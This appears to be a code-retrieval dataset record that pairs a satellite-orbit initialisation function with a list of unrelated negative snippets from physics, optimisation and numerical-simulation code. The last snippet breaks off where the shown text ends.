def calculate_initial_values(eph, rundate): data = sorted(eph["positions"].items()) pos_itrs = np.zeros((len(data), 3)) mjd1, mjd2 = zip(*[t for t, d in data]) rotation_mat = rotation.trs2gcrs(time.Time(val=mjd1, val2=mjd2, fmt="mjd", scale="utc")) tbl = time.Time(val=mjd1, val2=mjd2, fmt="mjd", scale="utc") for i in range(0, len(data)): pos_itrs[i] = data[i][1]["pos"] diffsec = np.array([(t - rundate).total_seconds() for t in tbl.utc.datetime]) # Table given in ITRF coordinate system. Convert to GCRS, where the integration of the satellite orbit will # be done pos_gcrs = np.sum(rotation_mat @ pos_itrs[:, :, None], axis=2) log.info("Interpolating data from prediction file in order to get initial pos/vel") pos_gcrs_ip, vel_gcrs_ip = interpolation.interpolate_with_derivative( diffsec, pos_gcrs, np.array([0.0]), kind="lagrange", window=10, bounds_error=False ) eph["initial_pos"] = pos_gcrs_ip[0] eph["initial_vel"] = vel_gcrs_ip[0] return eph
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialize(self):\n self.positions = self._generate_initial_positions()\n self.scores = np.array(self.compute_scores(self.positions))\n\n self._pso_data.best_positions = self.positions\n self._pso_data.best_scores = self.scores\n\n magic_constant = 2 # feel free to change FIXME\n max_velocity = (self.upper_bound - self.lower_bound) / magic_constant\n shape = (len(self.positions), len(self.lower_bound))\n self._pso_data.velocities = np.random.uniform(low=-max_velocity, high=max_velocity, size=shape)", "def _initialize_spline(self, initial_state, final_state):\r\n x_f = final_state[0]\r\n y_f = final_state[1]\r\n theta_f = final_state[2] # rad\r\n kappa_f = final_state[3] # rad\r\n kappa_0 = initial_state[3] # rad\r\n\r\n \r\n d = np.sqrt(x_f**2 + y_f**2)\r\n theta_delta = np.abs(theta_f)\r\n s = d*(( (theta_delta**2) / 5) +1) + 2*theta_delta/5\r\n \r\n # Initialization method from Nagy and Kelly, 2001 \r\n # a = 6*theta_f/(s**2) - 2*kappa_0/s + 4*kappa_f/s\r\n # c = 0\r\n # b = 3*(kappa_0 + kappa_f)/(s**2) + 6*theta_f/(s**3)\r\n\r\n # Initilalization method from Thomas M. Howard, 2009\r\n a = 0.0\r\n b = 0.0\r\n c = kappa_f\r\n \r\n return a, b, c, s", "def initialize(self):\n\n for timestep in self.x:\n self.y_previous.append(self.equation(timestep))\n self.y_current.append(self.equation(timestep))\n\n self.y_previous[0] = 0\n self.y_current[0] = 0\n self.y_previous[99] = 0\n self.y_current[99] = 0", "def initialize():\n\n global z_from_t_interp\n\n # Logarithmic spacing\n log_z_set = np.linspace(0.0, 3.0, 300)\n z_set = 10**(log_z_set) - 1.0\n\n t_set = np.zeros(len(z_set))\n for i, z in enumerate(z_set):\n t_set[i] = calc_lookback_time(z) / 1.0e6 # in Myr\n\n z_from_t_interp = interp1d(t_set, z_set, bounds_error=False, fill_value=100.0)", "def initRunningVals(self):\n self.r_Vm = [0.0]*self.mirror.dataPoints\n self.r_Va = [0.0]*self.mirror.dataPoints", "def get_initial_params(self, x, y, yerr):\n estimated_max = max(y)\n estimated_min = min(y)\n y1 = map(int, y *1000)\n estimated_position = x[ y1.index(min(y1)) ]\n estimated_width = (max(x) - min(x)) / 20.0\n p0 = array([estimated_position, estimated_width, estimated_max, estimated_min])\n return p0", "def initialize(H, Hmin, HZ, HminZ, solutes, restart_folder,\n field_to_subspace, XYZ,\n inlet_velocity,\n enable_NS, enable_PF, enable_EC,\n **namespace):\n w_init_field = dict()\n # if not restart_folder:\n # if enable_NS:\n # try:\n # subspace = field_to_subspace[\"u\"].collapse()\n # except:\n # subspace = field_to_subspace[\"u\"]\n # u_init = velocity_init(H, HZ, inlet_velocity, XYZ, 1, Hmin, HminZ)\n # w_init_field[\"u\"] = df.interpolate(u_init, subspace)\n\n # Ensure all processes have completed (Might be redundant)\n mpi_barrier()\n return w_init_field", "def __init__(self, timestep=1.0 * simtk.unit.femtoseconds):\n\n super(VelocityVerletIntegrator, self).__init__(timestep)\n\n self.addPerDofVariable(\"x1\", 0)\n\n self.addUpdateContextState()\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m\")\n self.addComputePerDof(\"x\", \"x+dt*v\")\n self.addComputePerDof(\"x1\", \"x\")\n self.addConstrainPositions()\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m+(x-x1)/dt\")\n self.addConstrainVelocities()", "def main():\n \n def get_x_input():\n \"\"\"\n This gets the initial x position and velocity values\n Param:none\n Return:Tuple with x pos and vel\n \"\"\"\n # Ask for and validate user input for x pos and vel\n while True:\n try:\n posx = float(input(\"Please enter the initial x position in m: \"))\n except ValueError:\n print(\"Invalid Input\")\n continue\n else:\n break\n\n while True:\n try:\n velx = float(input(\"Please enter the initial x velocity in m/s: \"))\n except ValueError:\n print(\"Invalid Input\")\n continue\n else:\n break\n \n #return tuple\n xinput = (posx, velx)\n return xinput\n\n def get_y_input():\n \"\"\"\n This gets the initial y position and velocity values\n Param:none\n Return:Tuple with y pos and vel\n \"\"\" \n # Ask for and validate user input for y pos and vel\n while True:\n try:\n posy = float(input(\"Please enter the initial y position in m: \"))\n\n #start at ground\n if posy < 0:\n print(\"Please enter a positive value.\")\n continue\n\n except ValueError:\n print(\"Invalid input\")\n continue\n else:\n break\n\n while True:\n try:\n vely = float(input(\"Please enter the initial y velocity in m/s: \"))\n except ValueError:\n print(\"Invalid Input\")\n continue\n else:\n break\n \n # Return tuple\n yinput = (posy, vely)\n return yinput\n\n #Inital position and velocity of user input x and y\n posx0, velx0 = get_x_input()\n posy0, vely0 = get_y_input()\n \n #acceleration y acceleration is gravity\n accelx = 0.0\n GRAVITY = -9.8 \n \n #Initial time of 0s, time intervals of .01 s\n deltat = .01\n t = 0.0\n \n #lists of all x and y positions in the motion \n x = [posx0]\n y = [posy0]\n \n #limit of time intervals to calculate\n intervals = 4000\n\n for i in range(0, intervals):\n #increment time, add xy positions at that time\n t = t + deltat\n x.append(position(posx0, velx0, t, accelx))\n y.append(position(posy0, vely0, t, GRAVITY))\n \n #if the projectile has hit the ground, break\n if y[i+1] <= 0:\n break\n\n plot_motion(x, y)", "def initialize_local_frame(self):\n self.local_offset_g = 0.0\n\n for i in range(30):\n rospy.sleep(0.1)\n\n q0, q1, q2, q3 = (\n self.current_pose_g.pose.pose.orientation.w,\n self.current_pose_g.pose.pose.orientation.x,\n self.current_pose_g.pose.pose.orientation.y,\n self.current_pose_g.pose.pose.orientation.z,\n )\n\n psi = atan2((2 * (q0 * q3 + q1 * q2)),\n (1 - 2 * (pow(q2, 2) + pow(q3, 2))))\n\n self.local_offset_g += degrees(psi)\n self.local_offset_pose_g.x += self.current_pose_g.pose.pose.position.x\n self.local_offset_pose_g.y += self.current_pose_g.pose.pose.position.y\n self.local_offset_pose_g.z += self.current_pose_g.pose.pose.position.z\n\n self.local_offset_pose_g.x /= 30.0\n self.local_offset_pose_g.y /= 30.0\n self.local_offset_pose_g.z /= 30.0\n self.local_offset_g /= 30.0\n\n rospy.loginfo(CBLUE2 + \"Coordinate offset set\" + CEND)\n rospy.loginfo(\n CGREEN2 + \"The X-Axis is facing: {}\".format(self.local_offset_g) + CEND)", "def initialise_calibration(self):\n for i in range(0, self.NUM_SENSORS):\n self.calibratedMax[i] = 0\n self.calibratedMin[i] = self.READING_TIMEOUT", "def recalibrate_start(self):\n self.epoch += 1\n self.initialize()\n self.recalibration_i = 0\n\n if self.vr_from_epoch is not None and self.epoch >= self.vr_from_epoch:\n for group in self.param_groups:\n for p in group['params']:\n param_state = self.state[p]\n param_state['gavg'].zero_()\n param_state['m2'].zero_()\n\n # xk is changed to the running_x\n p.data.zero_().add_(param_state['running_x'])\n param_state['tilde_x'] = p.data.clone()", "def evolve(self):\n\n rho = self.cc_data.get_var(\"density\")\n u = self.cc_data.get_var(\"x-velocity\")\n v = self.cc_data.get_var(\"y-velocity\")\n\n gradp_x = self.cc_data.get_var(\"gradp_x\")\n gradp_y = self.cc_data.get_var(\"gradp_y\")\n\n # note: the base state quantities do not have valid ghost cells\n beta0 = self.base[\"beta0\"]\n beta0_edges = self.base[\"beta0-edges\"]\n\n rho0 = self.base[\"rho0\"]\n\n phi = self.cc_data.get_var(\"phi\")\n\n myg = self.cc_data.grid\n\n # ---------------------------------------------------------------------\n # create the limited slopes of rho, u and v (in both directions)\n # ---------------------------------------------------------------------\n limiter = self.rp.get_param(\"lm-atmosphere.limiter\")\n\n ldelta_rx = reconstruction.limit(rho, myg, 1, limiter)\n ldelta_ux = reconstruction.limit(u, myg, 1, limiter)\n ldelta_vx = reconstruction.limit(v, myg, 1, limiter)\n\n ldelta_ry = reconstruction.limit(rho, myg, 2, limiter)\n ldelta_uy = reconstruction.limit(u, myg, 2, limiter)\n ldelta_vy = reconstruction.limit(v, myg, 2, limiter)\n\n # ---------------------------------------------------------------------\n # get the advective velocities\n # ---------------------------------------------------------------------\n\n \"\"\"\n the advective velocities are the normal velocity through each cell\n interface, and are defined on the cell edges, in a MAC type\n staggered form\n\n n+1/2\n v\n i,j+1/2\n +------+------+\n | |\n n+1/2 | | n+1/2\n u + U + u\n i-1/2,j | i,j | i+1/2,j\n | |\n +------+------+\n n+1/2\n v\n i,j-1/2\n\n \"\"\"\n\n # this returns u on x-interfaces and v on y-interfaces. These\n # constitute the MAC grid\n if self.verbose > 0:\n print(\" making MAC velocities\")\n\n # create the coefficient to the grad (pi/beta) term\n coeff = self.aux_data.get_var(\"coeff\")\n coeff.v()[:, :] = 1.0/rho.v()\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n self.aux_data.fill_BC(\"coeff\")\n\n # create the source term\n source = self.aux_data.get_var(\"source_y\")\n\n g = self.rp.get_param(\"lm-atmosphere.grav\")\n rhoprime = self.make_prime(rho, rho0)\n source.v()[:, :] = rhoprime.v()*g/rho.v()\n self.aux_data.fill_BC(\"source_y\")\n\n _um, _vm = lm_interface.mac_vels(myg.ng, myg.dx, myg.dy, self.dt,\n u, v,\n ldelta_ux, ldelta_vx,\n ldelta_uy, ldelta_vy,\n coeff*gradp_x, coeff*gradp_y,\n source)\n\n u_MAC = ai.ArrayIndexer(d=_um, grid=myg)\n v_MAC = ai.ArrayIndexer(d=_vm, grid=myg)\n\n # ---------------------------------------------------------------------\n # do a MAC projection to make the advective velocities divergence\n # free\n # ---------------------------------------------------------------------\n\n # we will solve D (beta_0^2/rho) G phi = D (beta_0 U^MAC), where\n # phi is cell centered, and U^MAC is the MAC-type staggered\n # grid of the advective velocities.\n\n if self.verbose > 0:\n print(\" MAC projection\")\n\n # create the coefficient array: beta0**2/rho\n # MZ!!!! probably don't need the buf here\n coeff.v(buf=1)[:, :] = 1.0/rho.v(buf=1)\n coeff.v(buf=1)[:, :] = coeff.v(buf=1)*beta0.v2d(buf=1)**2\n\n # create the multigrid object\n mg = vcMG.VarCoeffCCMG2d(myg.nx, myg.ny,\n xl_BC_type=self.cc_data.BCs[\"phi-MAC\"].xlb,\n xr_BC_type=self.cc_data.BCs[\"phi-MAC\"].xrb,\n yl_BC_type=self.cc_data.BCs[\"phi-MAC\"].ylb,\n yr_BC_type=self.cc_data.BCs[\"phi-MAC\"].yrb,\n xmin=myg.xmin, xmax=myg.xmax,\n ymin=myg.ymin, ymax=myg.ymax,\n coeffs=coeff,\n coeffs_bc=self.cc_data.BCs[\"density\"],\n verbose=0)\n\n # first compute div{beta_0 U}\n div_beta_U = mg.soln_grid.scratch_array()\n\n # MAC velocities are edge-centered. div{beta_0 U} is cell-centered.\n div_beta_U.v()[:, :] = \\\n beta0.v2d()*(u_MAC.ip(1) - u_MAC.v())/myg.dx + \\\n (beta0_edges.v2dp(1)*v_MAC.jp(1) -\n beta0_edges.v2d()*v_MAC.v())/myg.dy\n\n # solve the Poisson problem\n mg.init_RHS(div_beta_U)\n mg.solve(rtol=1.e-12)\n\n # update the normal velocities with the pressure gradient -- these\n # constitute our advective velocities. Note that what we actually\n # solved for here is phi/beta_0\n phi_MAC = self.cc_data.get_var(\"phi-MAC\")\n phi_MAC[:, :] = mg.get_solution(grid=myg)\n\n coeff = self.aux_data.get_var(\"coeff\")\n coeff.v()[:, :] = 1.0/rho.v()\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n self.aux_data.fill_BC(\"coeff\")\n\n coeff_x = myg.scratch_array()\n b = (3, 1, 0, 0) # this seems more than we need\n coeff_x.v(buf=b)[:, :] = 0.5*(coeff.ip(-1, buf=b) + coeff.v(buf=b))\n\n coeff_y = myg.scratch_array()\n b = (0, 0, 3, 1)\n coeff_y.v(buf=b)[:, :] = 0.5*(coeff.jp(-1, buf=b) + coeff.v(buf=b))\n\n # we need the MAC velocities on all edges of the computational domain\n # here we do U = U - (beta_0/rho) grad (phi/beta_0)\n b = (0, 1, 0, 0)\n u_MAC.v(buf=b)[:, :] -= \\\n coeff_x.v(buf=b)*(phi_MAC.v(buf=b) - phi_MAC.ip(-1, buf=b))/myg.dx\n\n b = (0, 0, 0, 1)\n v_MAC.v(buf=b)[:, :] -= \\\n coeff_y.v(buf=b)*(phi_MAC.v(buf=b) - phi_MAC.jp(-1, buf=b))/myg.dy\n\n # ---------------------------------------------------------------------\n # predict rho to the edges and do its conservative update\n # ---------------------------------------------------------------------\n _rx, _ry = lm_interface.rho_states(myg.ng, myg.dx, myg.dy, self.dt,\n rho, u_MAC, v_MAC,\n ldelta_rx, ldelta_ry)\n\n rho_xint = ai.ArrayIndexer(d=_rx, grid=myg)\n rho_yint = ai.ArrayIndexer(d=_ry, grid=myg)\n\n rho_old = rho.copy()\n\n rho.v()[:, :] -= self.dt*(\n # (rho u)_x\n (rho_xint.ip(1)*u_MAC.ip(1) - rho_xint.v()*u_MAC.v())/myg.dx +\n # (rho v)_y\n (rho_yint.jp(1)*v_MAC.jp(1) - rho_yint.v()*v_MAC.v())/myg.dy)\n\n self.cc_data.fill_BC(\"density\")\n\n # update eint as a diagnostic\n eint = self.cc_data.get_var(\"eint\")\n gamma = self.rp.get_param(\"eos.gamma\")\n eint.v()[:, :] = self.base[\"p0\"].v2d()/(gamma - 1.0)/rho.v()\n\n # ---------------------------------------------------------------------\n # recompute the interface states, using the advective velocity\n # from above\n # ---------------------------------------------------------------------\n if self.verbose > 0:\n print(\" making u, v edge states\")\n\n coeff = self.aux_data.get_var(\"coeff\")\n coeff.v()[:, :] = 2.0/(rho.v() + rho_old.v())\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n self.aux_data.fill_BC(\"coeff\")\n\n _ux, _vx, _uy, _vy = \\\n lm_interface.states(myg.ng, myg.dx, myg.dy, self.dt,\n u, v,\n ldelta_ux, ldelta_vx,\n ldelta_uy, ldelta_vy,\n coeff*gradp_x, coeff*gradp_y,\n source,\n u_MAC, v_MAC)\n\n u_xint = ai.ArrayIndexer(d=_ux, grid=myg)\n v_xint = ai.ArrayIndexer(d=_vx, grid=myg)\n u_yint = ai.ArrayIndexer(d=_uy, grid=myg)\n v_yint = ai.ArrayIndexer(d=_vy, grid=myg)\n\n # ---------------------------------------------------------------------\n # update U to get the provisional velocity field\n # ---------------------------------------------------------------------\n if self.verbose > 0:\n print(\" doing provisional update of u, v\")\n\n # compute (U.grad)U\n\n # we want u_MAC U_x + v_MAC U_y\n advect_x = myg.scratch_array()\n advect_y = myg.scratch_array()\n\n advect_x.v()[:, :] = \\\n 0.5*(u_MAC.v() + u_MAC.ip(1))*(u_xint.ip(1) - u_xint.v())/myg.dx +\\\n 0.5*(v_MAC.v() + v_MAC.jp(1))*(u_yint.jp(1) - u_yint.v())/myg.dy\n\n advect_y.v()[:, :] = \\\n 0.5*(u_MAC.v() + u_MAC.ip(1))*(v_xint.ip(1) - v_xint.v())/myg.dx +\\\n 0.5*(v_MAC.v() + v_MAC.jp(1))*(v_yint.jp(1) - v_yint.v())/myg.dy\n\n proj_type = self.rp.get_param(\"lm-atmosphere.proj_type\")\n\n if proj_type == 1:\n u.v()[:, :] -= (self.dt*advect_x.v() + self.dt*gradp_x.v())\n v.v()[:, :] -= (self.dt*advect_y.v() + self.dt*gradp_y.v())\n\n elif proj_type == 2:\n u.v()[:, :] -= self.dt*advect_x.v()\n v.v()[:, :] -= self.dt*advect_y.v()\n\n # add the gravitational source\n rho_half = 0.5*(rho + rho_old)\n rhoprime = self.make_prime(rho_half, rho0)\n source[:, :] = rhoprime*g/rho_half\n self.aux_data.fill_BC(\"source_y\")\n\n v[:, :] += self.dt*source\n\n self.cc_data.fill_BC(\"x-velocity\")\n self.cc_data.fill_BC(\"y-velocity\")\n\n if self.verbose > 0:\n print(\"min/max rho = {}, {}\".format(self.cc_data.min(\"density\"), self.cc_data.max(\"density\")))\n print(\"min/max u = {}, {}\".format(self.cc_data.min(\"x-velocity\"), self.cc_data.max(\"x-velocity\")))\n print(\"min/max v = {}, {}\".format(self.cc_data.min(\"y-velocity\"), self.cc_data.max(\"y-velocity\")))\n\n # ---------------------------------------------------------------------\n # project the final velocity\n # ---------------------------------------------------------------------\n\n # now we solve L phi = D (U* /dt)\n if self.verbose > 0:\n print(\" final projection\")\n\n # create the coefficient array: beta0**2/rho\n coeff = 1.0/rho\n coeff.v()[:, :] = coeff.v()*beta0.v2d()**2\n\n # create the multigrid object\n mg = vcMG.VarCoeffCCMG2d(myg.nx, myg.ny,\n xl_BC_type=self.cc_data.BCs[\"phi\"].xlb,\n xr_BC_type=self.cc_data.BCs[\"phi\"].xrb,\n yl_BC_type=self.cc_data.BCs[\"phi\"].ylb,\n yr_BC_type=self.cc_data.BCs[\"phi\"].yrb,\n xmin=myg.xmin, xmax=myg.xmax,\n ymin=myg.ymin, ymax=myg.ymax,\n coeffs=coeff,\n coeffs_bc=self.cc_data.BCs[\"density\"],\n verbose=0)\n\n # first compute div{beta_0 U}\n\n # u/v are cell-centered, divU is cell-centered\n div_beta_U.v()[:, :] = \\\n 0.5*beta0.v2d()*(u.ip(1) - u.ip(-1))/myg.dx + \\\n 0.5*(beta0.v2dp(1)*v.jp(1) - beta0.v2dp(-1)*v.jp(-1))/myg.dy\n\n mg.init_RHS(div_beta_U/self.dt)\n\n # use the old phi as our initial guess\n phiGuess = mg.soln_grid.scratch_array()\n phiGuess.v(buf=1)[:, :] = phi.v(buf=1)\n mg.init_solution(phiGuess)\n\n # solve\n mg.solve(rtol=1.e-12)\n\n # store the solution in our self.cc_data object -- include a single\n # ghostcell\n phi[:, :] = mg.get_solution(grid=myg)\n\n # get the cell-centered gradient of p and update the velocities\n # this differs depending on what we projected.\n gradphi_x, gradphi_y = mg.get_solution_gradient(grid=myg)\n\n # U = U - (beta_0/rho) grad (phi/beta_0)\n coeff = 1.0/rho\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n\n u.v()[:, :] -= self.dt*coeff.v()*gradphi_x.v()\n v.v()[:, :] -= self.dt*coeff.v()*gradphi_y.v()\n\n # store gradp for the next step\n\n if proj_type == 1:\n gradp_x.v()[:, :] += gradphi_x.v()\n gradp_y.v()[:, :] += gradphi_y.v()\n\n elif proj_type == 2:\n gradp_x.v()[:, :] = gradphi_x.v()\n gradp_y.v()[:, :] = gradphi_y.v()\n\n self.cc_data.fill_BC(\"x-velocity\")\n self.cc_data.fill_BC(\"y-velocity\")\n\n self.cc_data.fill_BC(\"gradp_x\")\n self.cc_data.fill_BC(\"gradp_y\")\n\n # increment the time\n if not self.in_preevolve:\n self.cc_data.t += self.dt\n self.n += 1", "def __call__(self, t_):\n X, Y, t, _n = self.X, self.Y, self.t, self._n\n x, y = 0, 0 # initial x and y return values\n for i in _n:\n p_i = 1 # initial lagrange polynomial value\n for j in _n:\n # if i != j: update lagrange polynomial\n if i != j: p_i *= (t_ - t[j]) / (t[i] - t[j])\n # mult ith control point by ith lagrange polynomial\n # (ith control point maps to ith time point)\n x += X[i] * p_i\n y += Y[i] * p_i\n return x, y", "def calc_refl(velocity, shotloc_x, shotloc_z, layer_idxs):\n solver_dg = pykonal.EikonalSolver(coord_sys=\"cartesian\")\n solver_dg.vv.min_coords = velocity.min_coords\n solver_dg.vv.node_intervals = velocity.node_intervals\n solver_dg.vv.npts = velocity.npts\n solver_dg.vv.values = velocity.values\n\n #shotloc = 2.56 # km\n src_idx = (int((shotloc_x - velocity.min_coords[0])/velocity.node_intervals[0]), int(shotloc_z/velocity.node_intervals[1]), 0)\n solver_dg.tt.values[src_idx] = 0\n solver_dg.unknown[src_idx] = False\n solver_dg.trial.push(*src_idx)\n solver_dg.solve()\n\n solver_ug = pykonal.EikonalSolver(coord_sys=\"cartesian\")\n solver_ug.vv.min_coords = solver_dg.vv.min_coords\n solver_ug.vv.node_intervals = solver_dg.vv.node_intervals\n solver_ug.vv.npts = solver_dg.vv.npts\n solver_ug.vv.values = solver_dg.vv.values\n\n for ix in range(solver_ug.tt.npts[0]):\n #idx = (ix, solver_ug.tt.npts[1]-1, 0)\n idx = (ix, layer_idxs[ix], 0)\n solver_ug.tt.values[idx] = solver_dg.tt.values[idx]\n #print(idx, solver_dg.tt.values[idx])\n solver_ug.unknown[idx] = False\n solver_ug.trial.push(*idx)\n solver_ug.solve()\n \n return solver_ug.tt.values[:,0,0]", "def LAT(self):\n # The maximum update amount for these element\n LateralFraction_DELTA = self.dt * (self.LateralFraction_LIMITS[1] -\n self.LateralFraction_LIMITS[0]) / (\n 2.0)\n\n # Add either positive or negative or zero delta for each\n # NOTE: 'High' is open bracket ) so the max is 1\n LateralFraction_DIRECTION = np.random.randint(-1, 2, 1)[0]\n\n # Now, modify modifiable params AND CLIP\n self.LateralFraction += LateralFraction_DIRECTION * LateralFraction_DELTA\n self.LateralFraction = np.clip(self.LateralFraction,\n self.LateralFraction_LIMITS[0],\n self.LateralFraction_LIMITS[1])", "def initial_velocity(self) -> float:\n return self._initial_velocity", "def initialize(self, state_space, state_positions, **__):\n # for organization purposes\n interval = self._initializer['interval']\n random_dist = self._initializer['random_init']\n random_params = self._initializer['random_params']\n self._initial_states.update(self._default_initializer['states'])\n if self._initializer['states'] is not None:\n self._initial_states.update(self._initializer['states'])\n\n # different limits for InductionMotor\n if any(state in self._initial_states for state in ['psi_ralpha', 'psi_rbeta']):\n # caution: _initial_limits sometimes contains singleton ndarrays, they must be\n # extracted with .item()\n nominal_values_ =\\\n [self._initial_limits[state].item() if isinstance(self._initial_limits[state], np.ndarray)\n else self._initial_limits[state] for state in self._initial_states]\n upper_bound = np.asarray(np.abs(nominal_values_), dtype=float)\n # state space for Induction Envs based on documentation\n # ['i_salpha', 'i_sbeta', 'psi_ralpha', 'psi_rbeta', 'epsilon']\n # hardcoded for induction motors currently given in the toolbox\n state_space_low = np.array([-1, -1, -1, -1, -1])\n lower_bound = upper_bound * state_space_low\n else:\n if isinstance(self._nominal_values, dict):\n nominal_values_ = [self._nominal_values[state]\n for state in self._initial_states.keys()]\n nominal_values_ = np.asarray(nominal_values_)\n else:\n nominal_values_ = np.asarray(self._nominal_values)\n\n state_space_idx = [\n state_positions[state] for state in self._initial_states.keys()\n ]\n\n upper_bound = np.asarray(nominal_values_, dtype=float)\n lower_bound = upper_bound * \\\n np.asarray(state_space.low, dtype=float)[state_space_idx]\n # clip nominal boundaries to user defined\n if interval is not None:\n lower_bound = np.clip(\n lower_bound,\n a_min=np.asarray(interval, dtype=float).T[0],\n a_max=None\n )\n upper_bound = np.clip(\n upper_bound,\n a_min=None,\n a_max=np.asarray(interval, dtype=float).T[1]\n )\n # random initialization for each motor state (current, epsilon)\n if random_dist is not None:\n if random_dist == 'uniform':\n initial_value = (upper_bound - lower_bound) \\\n * self._random_generator.uniform(size=len(self._initial_states.keys())) \\\n + lower_bound\n # writing initial values in initial_states dict\n random_states = {\n state: initial_value[idx] for idx, state in enumerate(self._initial_states.keys())\n }\n self._initial_states.update(random_states)\n\n elif random_dist in ['normal', 'gaussian']:\n # specific input or middle of interval\n mue = random_params[0] or (\n upper_bound - lower_bound) / 2 + lower_bound\n sigma = random_params[1] or 1\n a, b = (lower_bound - mue) / sigma, (upper_bound - mue) / sigma\n initial_value = truncnorm.rvs(\n a, b, loc=mue, scale=sigma, size=(\n len(self._initial_states.keys())),\n random_state=self.seed_sequence.pool[0]\n )\n # writing initial values in initial_states dict\n random_states = {\n state: initial_value[idx] for idx, state in enumerate(self._initial_states.keys())\n }\n self._initial_states.update(random_states)\n\n else:\n raise NotImplementedError\n # constant initialization for each motor state (current, epsilon)\n elif self._initial_states is not None:\n initial_value = np.atleast_1d(list(self._initial_states.values()))\n # check init_value meets interval boundaries\n if ((lower_bound <= initial_value).all()\n and (initial_value <= upper_bound).all()):\n initial_states_ = \\\n {state: initial_value[idx]\n for idx, state in enumerate(self._initial_states.keys())}\n self._initial_states.update(initial_states_)\n else:\n raise Exception(\n 'Initialization value has to be within nominal boundaries')\n else:\n raise Exception('No matching Initialization Case')", "def initialize_constants(self):\n # maximum pheromone value\n self.PH_MAX = np.float_( len(self.variables) / (1.0 - self.PH_REDUCE_FACTOR))\n # minimum pheromone value\n self.PH_MIN = np.float_(self.PH_MAX / (2*len(self.variables)) )", "def __init__(self):\n super().__init__()\n self.location = 0.0\n self.scale = 1.0\n self.type = 'Laplace'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def _compute_solar_torque(self):\n pass", "def __init__(\n self,\n velocity_north_m_s,\n velocity_east_m_s,\n velocity_down_m_s):\n self.velocity_north_m_s = velocity_north_m_s\n self.velocity_east_m_s = velocity_east_m_s\n self.velocity_down_m_s = velocity_down_m_s", "def get_start_velocity(self):\n # uniform circular motion have a start velocity of omega\n # TODO generate from start position and rotation direction\n return np.array([0, self.wz, 0])", "def setup_stellar_aberration(self,observer_velocity_xyz):\n self.v_for_stellar_aberr = sp.vscl(recip_clight,observer_velocity_xyz)", "def initialise(self):\n for i in range(self.nx):\n self.T[:, i] = (\n self.t_sun\n + self.mu\n * self.m_u\n * self.nabla\n * self.g\n * (self.y - self.y_max)\n / self.kb\n )\n self.P = self.p_sun * (self.T / self.t_sun) ** (1 / self.nabla)\n\n if self.Gaussian_perturbation:\n x_mean = 6e6\n y_mean = 2e6\n sigma = 8e5\n xx, yy = np.meshgrid(self.x, self.y)\n gaussian = self.t_sun * np.exp(\n -((xx - x_mean) ** 2 + (yy - y_mean) ** 2) / (2 * sigma ** 2)\n )\n self.T[:, :] = self.T[:, :] + gaussian\n\n self.rho[:, :] = self.P * self.mu * self.m_u / (self.kb * self.T[:, :])\n self.e[:, :] = self.P[:, :] / (self.Y - 1)", "def linear_evolve(self,nt=1):\n for l in range(nt):\n y_temp = np.empty(self.y.shape[0])\n for i in range(self.y.shape[0]):\n \n # idx left to the departure point\n j = int(np.floor((self.x[i]-self.u[i]*self.dt)/self.dx))\n # idx right to the departure point\n k = j+1\n print i, j, k\n # linear interpolation\n alpha = (self.x[i]-self.u[i]*self.dt - j*self.dx)/self.dx\n y_temp[i] = (1-alpha)*self.y[j] + alpha*self.y[k]\n # copy array to current time\n self.y = np.copy(y_temp)\n stop\n #return current varibale\n return self.y", "def initial_values(self):\n y = self._y\n trend = self.trend\n seasonal = self.seasonal\n seasoning = self.seasoning\n trending = self.trending\n m = self.seasonal_periods\n l0 = self._l0\n b0 = self._b0\n if seasoning:\n l0 = y[np.arange(self.nobs) % m == 0].mean() if l0 is None else l0\n if b0 is None and trending:\n lead, lag = y[m:m + m], y[:m]\n if trend == 'mul':\n b0 = np.exp((np.log(lead.mean()) - np.log(lag.mean())) / m)\n else:\n b0 = ((lead - lag) / m).mean()\n s0 = list(y[:m] / l0) if seasonal == 'mul' else list(y[:m] - l0)\n elif trending:\n l0 = y[0] if l0 is None else l0\n if b0 is None:\n b0 = y[1] / y[0] if trend == 'mul' else y[1] - y[0]\n s0 = []\n else:\n if l0 is None:\n l0 = y[0]\n b0 = None\n s0 = []\n\n return l0, b0, s0", "def solar_model():\n \n latitude, longitude, timezone, elevation = location_input()\n year, time = time_input()\n\n lat_r = latitude/180*np.pi\n lon_r = longitude/180*np.pi \n n = 0\n for i in range(1900,year):\n if i%4 == 0:\n n += 366\n else:\n n+=365\n JulD = n + time + 2415018.5 - (timezone)/24\n LT = time - int(time)\n JC = (JulD - 2451545) / 36525\n x = 46.815 + JC * (0.00059 - JC * 0.001813)\n M_OE = 23 + (26 + (21.448 - JC * x) / 60) / 60\n EEO = 0.016708634 - JC * (0.000042037 + 0.0000001267 * JC)\n GMAS = 357.52911 + JC * (35999.05029 - 0.0001537 * JC)\n GMAS_r = m.radians(GMAS)\n GMLS = (280.46646 + JC * (36000.76983 + JC * 0.0003032))%360\n GMLS_r = m.radians(GMLS)\n Obliq_C = M_OE + 0.00256 * np.cos((125.04 - 1934.136 * JC) / 180 * np.pi)\n Obliq_C_r = m.radians(Obliq_C)\n SEC = np.sin(GMAS_r) * (1.914602 - JC * (0.004817 + 0.000014 * JC)) + np.sin(2 * GMAS_r) * (0.019993 - 0.000101 * JC) + np.sin(3 * GMAS_r) * 0.000289\n STL = GMLS + SEC\n SAL = STL - 0.00569 - 0.00478 * np.sin((125.04 - 1934.136 * JC) / 180 * np.pi)\n SAL_r = m.radians(SAL)\n sin_Delta = np.sin(Obliq_C_r) * np.sin(SAL_r)\n Delta_r = np.arcsin(sin_Delta) #in radians \n Var_y = np.tan((Obliq_C / 2) / 180 * np.pi) * np.tan((Obliq_C / 2) / 180 * np.pi)\n EOT_prime = Var_y * np.sin(2 * GMLS_r) - 2 * EEO * np.sin(GMAS_r) + 4 * EEO * Var_y * np.sin(GMAS_r) * np.cos(2 * GMLS_r) - 0.5 * Var_y * Var_y * np.sin(4 * GMLS_r) - 1.25 * EEO * EEO * np.sin(2 * GMAS_r)\n EOT = 4 * EOT_prime / np.pi * 180 \n TST = (LT * 1440 + 